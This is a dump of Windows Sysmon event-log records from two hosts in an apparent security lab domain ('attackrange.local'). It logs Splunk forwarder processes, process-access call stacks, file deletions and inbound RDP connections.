SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047877Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.058{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8846-6151-E879-00000000FC01}2476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047876Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.058{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047875Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.058{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047874Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.058{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8846-6151-E879-00000000FC01}2476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047873Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.042{5EBD8912-8846-6151-E879-00000000FC01}2476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001047903Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:52.731{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65176-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047902Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:55.625{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0756BC4E9992F048E593B6EFB9C9D1AB,SHA256=85CCEA51CD1803CFB0C41C4746322BE4AB6580A278E7BD0FF5A7262A233370F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976428Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:51.653{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-35072-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976427Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:55.307{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=488032F4E513974269F8F3EC4A89E2E4,SHA256=6C7E2A2123C662B4FDC06D62179BEBA0E043D93DD0585CB279993A9BD84C2BEA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047901Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:55.441{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8847-6151-EA79-00000000FC01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047900Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:55.441{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047899Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:55.441{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047898Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:55.441{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047897Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:55.441{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047896Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:55.441{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8847-6151-EA79-00000000FC01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047895Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:55.441{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8847-6151-EA79-00000000FC01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047894Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:55.426{5EBD8912-8847-6151-EA79-00000000FC01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047893Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:55.078{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE1A2D7FAE6E24EB0661B09654F55ACC,SHA256=DD1C7E0E73DAD1DAC8BA6D872DF6DCB2382E8B6810DB607092411DF742D5E3F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047892Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:55.078{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02F74EC3675E219FA1006B6BCF11C22D,SHA256=57EC0A689C20A7F5038FA23F5C53782447809167FCBFCC702D642C2DF4380DE5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047916Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.886{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49213-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001047915Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.762{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60922-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047914Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:56.644{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03C8944283D1CDD3C0C8756728D6AC02,SHA256=BCBA915ACABE7191DFEC468E0F9C0D0935AA88D10D9A660CE98965DDFCC089BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976432Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:53.481{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49968-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976431Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:56.370{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2337952A90AB6394238FA109D18E4F98,SHA256=C788185119D9E26B6879B7B4C3FD77365770E2A4620CF2885F3B4CE4C460A3F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047913Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:56.382{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE1A2D7FAE6E24EB0661B09654F55ACC,SHA256=DD1C7E0E73DAD1DAC8BA6D872DF6DCB2382E8B6810DB607092411DF742D5E3F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047912Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:56.328{5EBD8912-8848-6151-EB79-00000000FC01}54204164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047911Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:56.125{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8848-6151-EB79-00000000FC01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047910Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:56.125{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047909Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:56.125{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047908Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:56.125{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047907Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:56.125{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047906Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:56.125{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8848-6151-EB79-00000000FC01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047905Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:56.125{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8848-6151-EB79-00000000FC01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047904Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:56.110{5EBD8912-8848-6151-EB79-00000000FC01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976430Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:56.264{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB8320424FF25ED2E9A3166CDC41AD48,SHA256=98D73CD44C51697A7C5443577002FA3AB93B3DA7D0B756304B35BF85CD6F5E95,IMPHASH=00000000000000000000000000000000falsetrue 